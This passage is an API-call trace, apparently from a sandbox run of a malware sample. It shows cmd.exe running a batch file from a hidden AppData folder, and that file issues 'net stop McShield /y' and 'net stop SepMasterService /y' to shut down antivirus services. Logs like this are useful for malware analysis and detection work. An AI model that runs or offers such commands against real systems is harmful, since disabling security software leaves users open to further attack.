lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.538] GetProcessHeap () returned 0x3e0000 [0203.538] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0203.538] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0203.538] GetProcessHeap () returned 0x3e0000 [0203.538] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0203.538] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.539] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.539] GetLastError () returned 0x2 [0203.539] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.539] GetLastError () returned 0x2 [0203.540] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.540] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0203.540] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0203.540] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.541] GetLastError () returned 0x2 [0203.541] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0203.541] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0203.541] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.542] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0203.542] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0203.542] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0203.542] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.542] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop McShield /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop McShield /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop McShield /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x46c, dwThreadId=0x7a0)) returned 1 [0203.546] CloseHandle (hObject=0x78) returned 1 [0203.546] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.546] GetProcessHeap () returned 0x3e0000 [0203.546] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.546] GetEnvironmentStringsW () returned 0x3f8408* [0203.546] GetProcessHeap () returned 0x3e0000 [0203.546] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.546] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.546] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0203.684] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0203.684] CloseHandle (hObject=0x74) returned 1 [0203.684] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0203.684] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0203.684] GetProcessHeap () returned 0x3e0000 [0203.684] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.684] GetEnvironmentStringsW () returned 0x3f8408* [0203.684] GetProcessHeap () returned 0x3e0000 [0203.684] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.685] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.685] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0203.685] GetProcessHeap () returned 0x3e0000 [0203.685] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.685] GetEnvironmentStringsW () returned 0x3f8408* [0203.685] GetProcessHeap () returned 0x3e0000 [0203.685] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.685] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.685] GetProcessHeap () returned 0x3e0000 [0203.685] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0203.685] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0203.685] _get_osfhandle (_FileHandle=1) returned 0x264 [0203.685] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0203.686] _get_osfhandle (_FileHandle=1) returned 0x264 [0203.686] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0203.686] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0203.686] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0203.686] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0203.686] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0203.686] SetConsoleInputExeNameW () returned 0x1 [0203.686] GetConsoleOutputCP () returned 0x1b5 [0203.686] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0203.686] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.687] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0203.687] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0203.687] _get_osfhandle (_FileHandle=3) returned 0x74 [0203.687] SetFilePointer (in: hFile=0x74, lDistanceToMove=3667, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe53 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0203.687] GetProcessHeap () returned 0x3e0000 [0203.687] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0203.688] _get_osfhandle (_FileHandle=3) returned 0x74 [0203.688] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe53 [0203.688] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xa6e, lpOverlapped=0x0) returned 1 [0203.688] SetFilePointer (in: hFile=0x74, lDistanceToMove=3697, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe71 [0203.688] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=30, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SepMasterService /y\r\nR2 /y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 30 [0203.688] _get_osfhandle (_FileHandle=3) returned 0x74 [0203.688] GetFileType (hFile=0x74) returned 0x1 [0203.688] _get_osfhandle (_FileHandle=3) returned 0x74 [0203.688] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe71 [0203.688] GetProcessHeap () returned 0x3e0000 [0203.688] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0203.688] GetProcessHeap () returned 0x3e0000 [0203.688] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0203.692] _tell (_FileHandle=3) returned 3697 [0203.692] _close (_FileHandle=3) returned 0 [0203.692] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0203.692] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0203.692] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0203.692] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0203.692] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0203.692] _wcsicmp (_String1="net", _String2="CD") returned 11 [0203.692] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0203.692] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0203.692] _wcsicmp (_String1="net", _String2="REN") returned -4 [0203.692] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0203.692] _wcsicmp (_String1="net", _String2="SET") returned -5 [0203.692] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0203.692] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0203.692] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0203.692] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0203.692] _wcsicmp (_String1="net", _String2="MD") returned 1 [0203.692] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0203.692] _wcsicmp (_String1="net", _String2="RD") returned -4 [0203.692] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0203.692] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0203.692] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0203.692] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0203.692] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0203.692] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0203.692] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0203.692] _wcsicmp (_String1="net", _String2="VER") returned -8 [0203.692] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0203.692] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0203.693] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0203.693] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0203.693] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0203.693] _wcsicmp (_String1="net", _String2="START") returned -5 [0203.693] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0203.693] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0203.693] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0203.693] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0203.693] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0203.693] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0203.693] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0203.693] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0203.693] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0203.693] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0203.693] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0203.693] SetErrorMode (uMode=0x0) returned 0x1 [0203.693] GetProcessHeap () returned 0x3e0000 [0203.693] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0203.693] GetProcessHeap () returned 0x3e0000 [0203.693] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0203.694] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.694] GetProcessHeap () returned 0x3e0000 [0203.694] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0203.694] GetProcessHeap () returned 0x3e0000 [0203.694] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0203.694] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0203.694] GetProcessHeap () returned 0x3e0000 [0203.694] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0203.694] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.694] GetProcessHeap () returned 0x3e0000 [0203.694] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0203.695] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0203.695] GetProcessHeap () returned 0x3e0000 [0203.695] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0203.695] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.695] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.696] GetLastError () returned 0x2 [0203.696] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.696] GetLastError () returned 0x2 [0203.696] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0203.697] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0203.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.697] GetLastError () returned 0x2 [0203.698] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0203.698] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0203.698] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.699] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0203.699] SetErrorMode (uMode=0x0) returned 0x1 [0203.699] GetProcessHeap () returned 0x3e0000 [0203.699] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0203.699] GetProcessHeap () returned 0x3e0000 [0203.699] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0203.699] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.699] GetProcessHeap () returned 0x3e0000 [0203.699] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0203.699] GetProcessHeap () returned 0x3e0000 [0203.699] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0203.700] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0203.700] GetProcessHeap () returned 0x3e0000 [0203.700] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0203.700] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.700] GetProcessHeap () returned 0x3e0000 [0203.700] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0203.700] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0203.700] GetProcessHeap () returned 0x3e0000 [0203.700] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0203.701] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.701] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.701] GetLastError () returned 0x2 [0203.701] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.702] GetLastError () returned 0x2 [0203.702] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.702] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0203.702] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0203.703] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.703] GetLastError () returned 0x2 [0203.703] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0203.703] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0203.704] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.704] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0203.704] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0203.704] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0203.704] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.705] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SepMasterService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SepMasterService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SepMasterService /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x6ac, dwThreadId=0x7ac)) returned 1 [0203.712] CloseHandle (hObject=0x74) returned 1 [0203.712] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.712] GetProcessHeap () returned 0x3e0000 [0203.712] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.712] GetEnvironmentStringsW () returned 0x3f8408* [0203.712] GetProcessHeap () returned 0x3e0000 [0203.712] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.712] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.712] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0203.851] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0203.851] CloseHandle (hObject=0x78) returned 1 [0203.851] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0203.851] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0203.851] GetProcessHeap () returned 0x3e0000 [0203.851] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.851] GetEnvironmentStringsW () returned 0x3f8408* [0203.851] GetProcessHeap () returned 0x3e0000 [0203.851] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.852] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.852] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0203.852] GetProcessHeap () returned 0x3e0000 [0203.852] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.852] GetEnvironmentStringsW () returned 0x3f8408* [0203.852] GetProcessHeap () returned 0x3e0000 [0203.852] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.852] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.852] GetProcessHeap () returned 0x3e0000 [0203.852] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0203.852] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0203.852] _get_osfhandle (_FileHandle=1) returned 0x264 [0203.852] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0203.852] _get_osfhandle (_FileHandle=1) returned 0x264 [0203.852] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0203.852] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0203.852] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0203.853] _get_osfhandle 